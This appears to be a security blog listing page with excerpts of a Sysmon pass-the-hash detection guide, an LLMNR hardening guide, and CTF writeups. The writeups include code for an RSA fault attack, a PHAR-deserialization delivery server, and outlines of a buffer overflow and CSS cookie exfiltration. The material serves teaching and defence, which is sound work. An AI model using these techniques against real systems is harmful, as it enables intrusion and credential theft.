
Pass-the-Hash Detection with Sysmon: Event Guide (2026)
Pass-the-Hash is one of the most damaging lateral movement techniques in Windows environments: it can turn a single compromised endpoint into a domain-wide compromise within hours. An attacker dumps NTLM hashes from LSASS memory with a tool such as Mimikatz, then authenticates to remote systems with the hash itself, never cracking a password. Because every logon succeeds, detection that keys on failed login attempts sees nothing. Sysmon Event ID 10 (ProcessAccess) covers the dumping step: it records every handle opened to the Local Security Authority Subsystem Service (lsass.exe) together with the source image, the requested access mask and the call trace. It does not see the later use of the hash, which surfaces as successful NTLM network logons (Security Event ID 4624, logon type 3) on the targets, so the two sources need to be correlated. This guide delivers comprehensive Pass-the-Hash detection with Sysmon: configuration for memory access monitoring, analysis patterns for LSASS interactions, SIEM integration strategies, and incident response workflows that stop lateral movement before attackers achieve domain persistence. ...
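As an added illustration of the LSASS-access rule the guide describes (this is example code written for this page, not the guide's configuration or any vendor's rule), the detector below flattens a Sysmon Event ID 10 record and alerts when a non-allowlisted process opens lsass.exe with VM_READ, with injection-capable rights, with PROCESS_ALL_ACCESS, or from a call stack that contains unbacked (UNKNOWN) frames. The allowlist paths and both sample events are constructed for the example.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Process access rights from winnt.h. VM_READ is the minimum a credential dumper needs;
# write/thread rights indicate an injection-capable handle.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF

# Hypothetical allowlist for this example. Build yours from a baseline of legitimate
# LSASS readers on your estate (AV/EDR engines, csrss, wininit); these paths are assumptions.
ALLOWLISTED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

def parse_event(xml_text):
    """Flatten a Sysmon event into {field: value}: the EventID plus every <Data Name=...>."""
    root = ET.fromstring(xml_text)
    event = {"EventID": int(root.find("e:System/e:EventID", NS).text)}
    for data in root.findall("e:EventData/e:Data", NS):
        event[data.get("Name")] = data.text or ""
    return event

def lsass_access_reasons(event):
    """Reasons to alert on one Event ID 10 record; an empty list means no alert."""
    if event.get("EventID") != 10:
        return []
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return []
    source = event.get("SourceImage", "").lower()
    if source in ALLOWLISTED_SOURCES:
        return []
    mask = int(event.get("GrantedAccess", "0x0"), 16)
    reasons = []
    if mask & PROCESS_VM_READ:
        reasons.append("VM_READ on lsass.exe from non-allowlisted %s" % source)
    if mask & (PROCESS_VM_WRITE | PROCESS_CREATE_THREAD):
        reasons.append("injection-capable mask 0x%x on lsass.exe" % mask)
    if mask == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS requested on lsass.exe")
    # Sysmon logs frames with no backing module as UNKNOWN(...): shellcode or a
    # manually mapped DLL rather than a normal API path.
    if "UNKNOWN(" in event.get("CallTrace", ""):
        reasons.append("unbacked (UNKNOWN) frames in CallTrace")
    return reasons

def scan(events_xml):
    """Run the rule over raw Sysmon event XML strings; returns [(SourceImage, reasons)]."""
    alerts = []
    for xml_text in events_xml:
        ev = parse_event(xml_text)
        reasons = lsass_access_reasons(ev)
        if reasons:
            alerts.append((ev["SourceImage"], reasons))
    return alerts

# Two constructed events (not real telemetry): a Mimikatz-style read and a Defender scan.
SAMPLE_EVENTS = [
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>10</EventID></System>
  <EventData>
    <Data Name="SourceImage">C:\Users\bob\Downloads\mimikatz.exe</Data>
    <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
    <Data Name="GrantedAccess">0x1010</Data>
    <Data Name="CallTrace">C:\Windows\SYSTEM32\ntdll.dll+9c534|UNKNOWN(00007FF6A0001234)</Data>
  </EventData>
</Event>""",
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>10</EventID></System>
  <EventData>
    <Data Name="SourceImage">C:\Program Files\Windows Defender\MsMpEng.exe</Data>
    <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
    <Data Name="GrantedAccess">0x1410</Data>
    <Data Name="CallTrace">C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Windows\System32\KERNELBASE.dll+2ac9e</Data>
  </EventData>
</Event>""",
]

if __name__ == "__main__":
    for source, reasons in scan(SAMPLE_EVENTS):
        print(source, "->", "; ".join(reasons))
```

The 0x1010 mask (PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ) is the minimal read that memory dumpers request; tuning the allowlist by full path rather than by image name is what keeps a renamed dumper from slipping through.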

DalCTF 2026 Writeup: All 9 Challenges Solved
Platform: DalCTF 2026 (dalctf2026.com)
Difficulty: Mixed (Easy → Medium)
OS: Jeopardy — Crypto, Reverse Engineering, Web, Android
Tags: RSA modulus with small prime factor recovered by trial division, Bellcore CRT fault attack as the verification path, Playfair decryption against an un-keyed alphabet square, Huffman tree decode with inverted tiebreaker convention, LCG state recovery from one known plaintext byte, IEEE-754 bit-pattern reinterpretation via Quake-style float pointer cast, UPX-packed ELF unpacked into 44 per-byte check functions, Android APK static-string mining across MainActivity + strings.xml + ColorKt, HTML hidden attribute as a flag-hiding sink

DalCTF 2026 is the DalCTF Jeopardy event with challenges spread across Crypto, Reverse Engineering, Web, and Android. The 2026 edition leans heavily into classical cryptography mistakes wrapped in misdirection — six of the nine challenges are crypto, and almost every one of them tries to push you toward a harder attack than the one that actually works. The flag format is dalctf{...} (occasionally DalCTF{...}), and the challenge names are explicit hints once you’ve solved them. ...
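The two RSA tags above (small factor by trial division, Bellcore CRT fault) are shown below in an added example that is not the writeup's own solver: a toy key built from two Mersenne primes stands in for the challenge's modulus, and the fault is simulated by corrupting the mod-q half of an RSA-CRT signature. With one faulty signature s' of a known message m, s'^e still matches m modulo p but not modulo q, so gcd(s'^e - m, N) is p; when a correct signature of the same message is also available, gcd(s - s', N) works too.

```python
from math import gcd

# Constructed toy key for this example: Mersenne primes stand in for real RSA primes.
P = (1 << 61) - 1          # 2^61 - 1
Q = (1 << 89) - 1          # 2^89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))

def trial_division(n, bound=1_000_000):
    """Smallest prime factor of n below `bound`, or None: the 'small prime factor' shortcut."""
    if n % 2 == 0:
        return 2
    f = 3
    while f < bound and f * f <= n:
        if n % f == 0:
            return f
        f += 2
    return None

def crt_sign(m, corrupt_q_half=False):
    """Textbook RSA-CRT signature with Garner recombination.
    corrupt_q_half=True simulates a glitch in the mod-q exponentiation (the Bellcore fault model)."""
    sp = pow(m, D % (P - 1), P)
    sq = pow(m, D % (Q - 1), Q)
    if corrupt_q_half:
        sq ^= 1                       # any change to the q-half is enough to break it
    h = (pow(Q, -1, P) * (sp - sq)) % P
    return sq + h * Q                 # correct mod p regardless of the fault

def bellcore_factor(faulty_sig, m):
    """Single faulty signature plus the message: gcd(s'^e - m, N) = p."""
    return gcd((pow(faulty_sig, E, N) - m) % N, N)

def bellcore_factor_pair(good_sig, faulty_sig):
    """Correct and faulty signature of the same message: gcd(s - s', N) = p."""
    return gcd((good_sig - faulty_sig) % N, N)

if __name__ == "__main__":
    m = 0xC0FFEE
    s_bad = crt_sign(m, corrupt_q_half=True)
    print("recovered p:", bellcore_factor(s_bad, m) == P)
    print("small factor of 101*P:", trial_division(101 * P))
```

The verification path in the challenge is the same computation: a signature that fails to verify but still reduces correctly modulo one prime is itself the leak.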

Disable LLMNR and NBT-NS via Group Policy: 2026 Security Guide
LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are legacy name resolution protocols that attackers exploit to capture credentials through poisoning attacks. When a Windows client can’t resolve a hostname via DNS, it falls back to broadcasting LLMNR and NBT-NS queries across the network — and attackers respond with malicious answers, capturing authentication attempts. Tools like Responder and Inveigh make this attack trivial, turning misconfigured name resolution into domain compromise. This guide shows how to disable LLMNR and NBT-NS via Group Policy, with registry paths, PowerShell verification, testing procedures, and complete rollback instructions for Windows 11 and Server 2025 environments. ...

GPN CTF 2026 Writeup: All 19 Challenges + LLM Harness Post-Mortem
Platform: GPN CTF 2026 (kitctf)
Difficulty: Mixed (Easy → Hard)
OS: Jeopardy — Reverse, Crypto, Web, Pwn, Misc
Tags: AVX2 lane-swap miscompilation discovery + Kannan-embedding SIS lattice attack, NTRU mod-q reduction bug (c mod p == m), ECDSA nonce reuse from MD5(uuid3) collisions via fastcoll, eBPF signed-comparison verifier bypass with patched bzImage, JVM AOT cache override of bytecode, PHP 7.4 PHAR deserialization across two TCP races, Pydantic ForwardRef eval in create_model, CSS attribute-selector cookie exfiltration through Link: rel=stylesheet, holpy proof-checker thm re-axiomatization, knitout front/back-bed bitmap, ternary amplitude-modulated UART, Hamiltonian path on 250-node FSM extracted from jump tables, RFC 5424 syslog stream demux, Rust setuid TOCTOU symlink swap

GPN CTF 2026 is the Gulaschprogrammiernacht CTF hosted annually by KITCTF at the GPN hacker camp in Karlsruhe, Germany. The 2026 edition runs a Jeopardy board across reverse engineering, crypto, web, pwn, and misc, with a sharp lean toward low-level systems bugs — a missing mod q in an NTRU implementation, a 4-way AVX2 lane-swap in a gcc -O3 -mavx2 build, a deleted BPF_ADJ_END_FROM_* check in a custom kernel, a JVM AOT cache that silently overrides a JAR method. The flavour throughout is kitchen — recipes, ovens, pots — and the flags universally read like Bavarian beer-tent slogans. ...

GPN CTF 2026 — LLM Harness Post-Mortem: Where Claude Code Got It Right (and Wrong)
Platform: GPN CTF 2026 (kitctf)
Difficulty: Meta — harness post-mortem
OS: Tooling — Claude Code (Opus 4.x, 1M context), Bash sandbox, sub-agents
Tags: orchestrating Claude Code with parallel sub-agents, using scratch directories as harness cache, keeping main-thread context lean by routing bulk output through sub-agents, building 'kill the wrong plan' as a forcing function, recognising harness hallucinations in less-common ecosystems by grep-confirmation

The LLM harness post-mortem isn’t about one challenge — it’s about the workflow that produced the other 18 writeups in the GPN CTF 2026 repository. What the harness around Claude Code actually looked like during a 24-hour CTF, what it was good at, where it embarrassed me, and which design choices I’d keep. This writeup is the standalone version of the meta-writeup submitted for the Best LLM Harness Writeup prize at GPN CTF 2026. ...
![GPN CTF 2026 Recipe for Disaster writeup — gets() overflows char note[32] into an adjacent int price field](https://cybersecurityelite.com/images/articles/gpn-ctf-2026-recipe-for-disaster.png)
GPN CTF 2026 — Recipe for Disaster: gets() Overflow into an Adjacent int
Platform: GPN CTF 2026 (kitctf)
Difficulty: Easy
OS: Pwn — stack buffer overflow, adjacent-field overwrite
Tags: reading the Item struct layout to confirm note and price are adjacent with no padding, sending 32 bytes of A plus four bytes of 0xff to set price to -1, observing verify_total trigger print_coupon, recognising gets() as the classic unbounded read (deprecated in C99, removed in C11) that has been exploited since the Morris Worm (1988)

Recipe for Disaster is the GPN CTF 2026 pwn challenge, and the most direct teaching example you’ll ever see of why gets was removed from C11. A note-taking program reads into a 32-byte note field with gets(), which imposes no length limit at all. Send more than 32 characters and bytes 33 through 36 land in the adjacent int price field of the same Item struct. Four 0xff bytes there make price = -1 (0xffffffff read as a two's-complement int), verify_total() takes the price == -1 path and calls print_coupon() → flag. The flag itself names the lesson: ...

GPN CTF 2026 — Customer Service: Three Bugs in a holpy Proof Checker
Platform: GPN CTF 2026 (kitctf)
Difficulty: Medium-Hard
OS: Misc — holpy proof checker, LCF-style higher-order logic
Tags: reading 115 lines of checker glue around holpy's monitor, spotting list == 1 as a dead branch, recognising Theorem.get_extension always re-axiomatizes, exploiting concl.is_const('false') as a name comparison in an EmptyTheory scope, declaring a homemade false constant and proving it with a one-line theorem rule

Customer Service is the GPN CTF 2026 misc challenge that builds an LCF-style higher-order-logic proof assistant from holpy, pretends to forbid axioms, and gets its guard wrong three ways. The exploit is a three-item JSON payload: declare a false constant of our own, axiomatize it, ship a one-line proof. The flag spells the lesson: ...

GPN CTF 2026 — Organized: Ternary Amplitude-Modulated UART in Popcount Density
Platform: GPN CTF 2026 (kitctf)
Difficulty: Medium
OS: Misc — signal recovery from high-entropy file, ternary amplitude modulation
Tags: rejecting the 'random noise' default hypothesis, computing per-window popcount means and run-lengths, plotting a 200-bin histogram to spot three peaks instead of two, recognising the structure as UART (start bit, 8 data bits LSB-first, stop bit) framed by a mid-amplitude idle marker, decoding 49 frames to ASCII

Organized is the GPN CTF 2026 misc challenge whose entire trick is recognising the carrier’s organization. The handout is a 7,650,000-byte file that looks like noise — file(1) calls it data, every bit position is 1 with probability ≈ 0.287. The “organization” is hidden in the bit-density of windows, not in the bytes themselves: per-12,500-byte window popcount falls into one of three sharp levels, giving a 612-trit string. Past a 24-trit preamble, the rest is 49 UART-style frames of 12 trits each. Decode → ASCII → flag: ...
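The recovery pipeline described above, as an added example that is not the writeup's own solver. It scales the carrier down (1,000-byte windows instead of 12,500, a short message instead of 49 frames) and makes two assumptions the writeup does not spell out: the three density levels (0.15 / 0.30 / 0.45 here) and the position of the mid-level idle marker inside the 12-trit frame (one marker trit on each side of the 10-bit UART frame: idle, start, eight data bits LSB-first, stop, idle). The encoder exists only so the decoder has a carrier to run on; the decoder side (per-window popcount, three-level quantisation, frame check) is the part that transfers to the real handout.

```python
import random

LOW, MID, HIGH = 0, 1, 2        # the three density levels; MID doubles as the idle marker
FRAME_TRITS = 12                # per frame, as in the challenge
DENSITY = {LOW: 0.15, MID: 0.30, HIGH: 0.45}   # assumed per-level bit density

def frame_for_byte(b):
    """Assumed layout: idle, start(0), d0..d7 LSB-first, stop(1), idle."""
    data = [HIGH if (b >> k) & 1 else LOW for k in range(8)]
    return [MID, LOW] + data + [HIGH, MID]

def encode(message, preamble_len=24):
    trits = [MID] * preamble_len          # all-idle preamble is an assumption
    for b in message.encode():
        trits += frame_for_byte(b)
    return trits

def trits_to_carrier(trits, window_bytes=1000, seed=1):
    """Constructed carrier: each trit becomes one window whose popcount sits at its level."""
    rng = random.Random(seed)
    nbits = window_bytes * 8
    out = bytearray()
    for t in trits:
        ones = round(DENSITY[t] * nbits)
        bits = [1] * ones + [0] * (nbits - ones)
        rng.shuffle(bits)
        out += int("".join(map(str, bits)), 2).to_bytes(window_bytes, "big")
    return bytes(out)

def window_densities(data, window_bytes):
    """Fraction of set bits per fixed-size window; a trailing partial window is dropped."""
    usable = len(data) - len(data) % window_bytes
    return [bin(int.from_bytes(data[i:i + window_bytes], "big")).count("1") / (window_bytes * 8)
            for i in range(0, usable, window_bytes)]

def quantize(densities):
    """Three levels: split the observed range into thirds (assumes all three levels occur)."""
    lo, hi = min(densities), max(densities)
    t1, t2 = lo + (hi - lo) / 3, lo + 2 * (hi - lo) / 3
    return [LOW if d < t1 else MID if d < t2 else HIGH for d in densities]

def decode(trits, preamble_len=24):
    body = trits[preamble_len:]
    out = bytearray()
    for i in range(0, len(body) - FRAME_TRITS + 1, FRAME_TRITS):
        f = body[i:i + FRAME_TRITS]
        if f[0] != MID or f[1] != LOW or f[10] != HIGH or f[11] != MID:
            raise ValueError("bad frame at trit %d: %r" % (preamble_len + i, f))
        out.append(sum((f[2 + k] == HIGH) << k for k in range(8)))
    return out.decode()

def recover(data, window_bytes=1000, preamble_len=24):
    return decode(quantize(window_densities(data, window_bytes)), preamble_len)

if __name__ == "__main__":
    carrier = trits_to_carrier(encode("dalctf{ok}"))
    print(len(carrier), "bytes ->", recover(carrier))
```

On the real handout the only knobs are the window size and the preamble length; the frame check is what tells you the quantisation thresholds are right, because a wrong threshold breaks the start/stop bits long before it breaks the printable ASCII.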

GPN CTF 2026 — Pharry: PHP 7.4 PHAR Deserialization via Two-Connection Race
Platform: GPN CTF 2026 (kitctf)
Difficulty: Medium-Hard
OS: Web — PHP 7.4, PHAR metadata unserialize, two-TCP-connection trick
Tags: recognising md5_file and file_get_contents both open separate TCP connections to a URL, hosting a connection-counting HTTP server that returns different responses per attempt, crafting a PHAR with a User object metadata that fires system() in __destruct, triggering PHAR unserialize via md5_file(phar:///tmp/...) for RCE

Pharry is the GPN CTF 2026 PHP challenge that turns a md5_file + file_get_contents integrity-check pair into a PHAR deserialization. Both PHP functions open separate TCP connections to the URL they’re given, so a counting server can serve one response to md5_file (close to make it return FALSE) and another to file_get_contents (return a PHAR). The PHAR ends up at /tmp/remote_file.jpg. A second request to phar:///tmp/remote_file.jpg/a.txt triggers PHP’s metadata unserialize(), which fires User::__destruct() → system("rm " . $avatar_path) → RCE. The automatic unserialize() of PHAR metadata on phar:// access is PHP 7.x behaviour; PHP 8.0 stopped unserializing metadata automatically, so the same code on PHP 8 would not reach __destruct(). ...
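The connection-counting server from the tags, as an added example (my code, not the writeup's): every TCP connection to the same URL gets a different answer, so PHP's md5_file() sees a failure and the following file_get_contents() receives the archive. Two things are changed from the writeup for the sake of a self-contained demo: the failing response is an HTTP 500 (PHP's http stream wrapper then returns FALSE, the same outcome as closing the socket), and the PHAR bytes are a constructed stand-in, since the real payload is built with PHP's Phar class and its metadata.

```python
import threading
import http.client
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed stand-in for the real archive; a working payload would be produced by
# PHP's Phar class with setMetadata() on the User object. Only the delivery trick is shown.
PHAR_STANDIN = b"<?php __HALT_COMPILER(); ?>\n[phar archive bytes would follow]"

def plan(attempt):
    """Odd-numbered connections fail (what md5_file sees), even ones get the archive."""
    if attempt % 2 == 1:
        return 500, b""
    return 200, PHAR_STANDIN

class CountingHandler(BaseHTTPRequestHandler):
    """Answers per connection, not per URL. PHP opens a fresh TCP connection for each
    stream call, which is exactly what makes md5_file and file_get_contents separable."""
    attempts = 0
    lock = threading.Lock()

    def do_GET(self):
        with CountingHandler.lock:
            CountingHandler.attempts += 1
            n = CountingHandler.attempts
        status, body = plan(n)
        self.send_response(status)
        self.send_header("Content-Type", "image/jpeg")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):       # keep the demo quiet
        pass

def start_server(host="127.0.0.1", port=0):
    """Bind (port 0 = any free port) and serve in a background thread."""
    srv = ThreadingHTTPServer((host, port), CountingHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

def fetch(port, path="/avatar.jpg"):
    """One request over one fresh TCP connection, like each PHP stream call does."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, body

if __name__ == "__main__":
    srv = start_server()
    port = srv.server_address[1]
    print("md5_file sees:        ", fetch(port)[0])
    print("file_get_contents sees:", fetch(port)[0])
    srv.shutdown()
    srv.server_close()
```

The per-connection counter is the whole point: an integrity check that fetches a remote resource twice is only as strong as the assumption that both fetches see the same bytes, and that assumption does not hold against a server the attacker controls.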
![GPN CTF 2026 Tinyweb writeup — Link header CSS injection plus body[onload^=...] attribute selectors leak the cookie character-by-character](https://cybersecurityelite.com/images/articles/gpn-ctf-2026-tinyweb.png)
GPN CTF 2026 — Tinyweb: Link Header CSS Injection + Attribute Selector Exfil
Platform: GPN CTF 2026 (kitctf)
Difficulty: Medium
OS: Web — Node http, Link header injection, CSS attribute-selector exfil
Tags: recognising unescape as a percent-decoder that mangles header values, splitting on Link header's comma+semicolon structural separators, injecting a second link entry with rel=stylesheet, hosting the CSS on a serveo-style tunnel that doesn't show an interstitial, iterating body[onload^=prefix] one character at a time

Tinyweb is GPN CTF 2026’s pure-web challenge — 481 bytes of one-line Node http server with two reflection points and one admin bot that visits attacker-supplied URLs with the flag in a cookie. The intended path turns out to be an XS-Leaks-style CSS attribute-selector exfiltration: inject rel=stylesheet into the Link header via unescape percent-decoding, host CSS that uses body[onload^="prefix"] selectors to fire background: url(...) requests, iterate one character at a time. ~45 iterations of ~35 seconds each recover: ...